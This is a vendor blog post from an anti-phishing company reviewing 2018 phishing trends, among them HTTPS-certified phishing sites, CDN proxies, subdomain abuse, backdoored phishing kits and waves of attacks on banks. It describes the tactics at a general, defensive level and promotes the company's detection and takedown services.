As we dive into 2019, customer-facing phishing remains one of the top cybersecurity threats. In our battles to combat these, we’ve noticed certain trends that are making phishing attacks much harder to detect and stop. Last year, Segasec anti-phishing experts encountered (and thwarted I might add) some pretty devious phishing tactics. Here are the top five phishing trends that have gained momentum and show no signs of abating.
Cybercriminals use HTTPS protocol to “secure” their phishing sites
Ever on the lookout for better ways to fool users into handing over personal information and online credentials, threat actors are “going legit” by obtaining valid HTTPS certificates and using TLS encryption to make their phishing sites “secure.”
HTTPS or SSL/TLS indeed makes the connection secure (HTTPS = Hypertext Transfer Protocol Secure, TLS = Transport Layer Security, SSL = Secure Sockets Layer) but it doesn’t mean anything as to whether the site is malicious or not. According to APWG’s latest Phishing Activity Trends Report, “half of all phishing attacks are now hosted on websites that had HTTPS and SSL certificates.” It’s a very sneaky and smart tactic. And it works. When site visitors see the little green padlock in the browser URL bar, they think it’s safe to communicate and transact with the site.
Thanks to this new tactic, not only do counterfeit phishing sites look and act like the brand they are mimicking, they’re playing by the security rules that we all depend on for safe browsing! It’s no wonder so many users continue to get phished!
What do security certificates actually mean?
An informal Twitter poll by security guru Troy Hunt revealed that most ordinary, non-tech users do not know about HTTPS and SSL certificates. Of those that do know, 37% of non-tech users look for the Domain Validation (DV) SSL certificate (i.e., the green padlock) for security assurance. That’s a good start, but of all the SSL certificates, DV is the weakest. It verifies that the site owner has administrative control of the site. That’s it. A DV cert does not reveal the site owner’s name, organization or country. That’s why DV certification is such good leverage for threat actors. It makes the phishing site look legit and secure while keeping the owner’s true identity hidden.
To build their phishing infrastructure, we’ve noticed that cybercriminals like to buy domains from specific resources. (The names of these resources were kept by the editor in order to avoid public shaming.) Moreover, some certificate authorities offer free DV SSL certificates in return for very little information, which almost guarantees continued and even increased abuse by phishers.
On the other hand, an Extended Validation (EV) SSL certificate is much more rigorous verification process in which the website owner must prove exclusive rights to use and operate the domain. The required information includes the owner’s business name and country which is presented directly in the browser window. Unfortunately, according to Hunt’s poll, only 4% of users look for an EV cert, and threat actors know it. Just the basic veneer of security is all that is needed to fool most people.
Cybercriminals hide phishing sites behind proxies
Another phenomenon we noticed in 2018 is that many times, hackers will use a global network and CDN providers, to mask their hosting provider as they route all of their phishing traffic through the proxy. Some of these CDN providers even give SSL certificates for the proxy site so it appear totally legit. Even when a malicious site is detected and verified by someone like Segasec, the proxy setup buys them time to keep phishing before the site it blocked or taken down.
In our experience and to their credit, most of these global network and CDN providers react very fast when it comes to requests to take down malicious sites. With their cooperation, it can be done pretty quickly – often in less than an hour. Bear in mind that taking down any website is not a trivial matter. Hosting providers and domain registrars have to be 100% sure of foul play before they are willing to disable a working website. That’s why we continue to perfect Segasec technologies for early detection of phishing infrastructure and pre-emptive takedown. So far, we’ve had zero false positives and that’s important to building effective anti-phishing partnerships.
Do hosting providers abet phishing?
Even with all the proof, some hosting providers are not so responsive to requests to take down phishing sites. You might even call them “hacker friendly” hosting providers. But all is not lost. When we encounter “takedown aversion” we leverage other tools like Google Safe Browsing, Microsoft Defender or other anti-virus software to disable communication with a malicious site. Partnerships play such an important role here, enabling us to immediately notify most browsers about a new phishing URL so they can flag it and notify their users.
We also maintain our own database of phishing sites called Zelda*. Anyone (including AV vendors) can download the Zelda anti-phishing extension (for Chrome for Firefox) for their browser, and they’ll be protected from all phishing scams that Segasec finds.
(*Zelda anti-phishing is an open source project. You can access it here)
Phishing sites hide behind subdomains
Throughout 2018 we saw increased use of free dynamic DNS services as phishers hide behind their subdomains. While some of these DNS services claim to have a very strict abuse policy to keep their system domains free of malicious activity, abuse still occurs rather frequently. It’s impossible to police it.
The use of subdomains and second level of sub domains is quite prevalent the banking industry. It starts with a phishing email that sends you to a site whose URL might look like this: “https://www.bank-name.com.some-other-domain.com” Hackers obtain the domain for free, so they don’t have to use credit cards, making it impossible to trace back an attacker. Then they use prebuilt kits to create an unlimited number of subdomains for their phishing sites. And they can do it in a matter of minutes. Bank customers who aren’t paying attention will see the bank name, think it’s legit, and hand over their credentials. It’s prevalent because it works. That’s why you need to disarm these phishers preemptively – before the attack launches.
Cyber criminals are using pre-built Phishing Kits
Phishing kits have come a long way since their emergence in 2007. Typically, the kit is delivered in a zip file that contains all the necessary HTML/PHP templates, scripts, and images to create a fully operational phishing site. You no longer have to be a techno-nerd to use it. In 2018, we noticed that the use of prebuilt phish kits is on the rise (possibly in tandem with the use of subdomains). “Phish kits” can be purchased on the dark web for as little as a few dollars, but these kits are also being distributed for free via social networks and hacker forums. Often, the free kits have a “backdoor” in the code that automatically copies and forwards all the phishing campaign data to the kit author. The kit user is not savvy enough to detect the backdoor. This puts phishing victims in double jeopardy – once from the phish kit user and again from the phish kit author!
Phishing comes in waves
While each phishing attack may seem like a unique event, most phishing campaigns use the same basic tactics and techniques. The phish kits mentioned above are an extreme example of this commonality. But even very skilled phishers will use the same attack tactics against different targets. For example, in 2018, we saw waves of phishing attacks against the banking industry. The first wave targeted one bank. As soon as the first wave subsided, another attack was launched against a different bank, followed by a third wave, and so on. Segasec AI machine learning uses this data to identify attack patterns so when subsequent waves of attacks are detected, we are ready for pre-emptive takedown.
Outlook for 2019: Get smart or get phished
Since Segasec AI models focus exclusively on phishing, our solution gets smarter with every phishing event that we detect and monitor on the web. I wish I could say the same about users but unfortunately, people continue to be fooled by devious phishers. Organizations who adopt an intelligent and pre-emptive anti-phishing posture can more effectively protect their brand reputation and their customers from phishing abuse.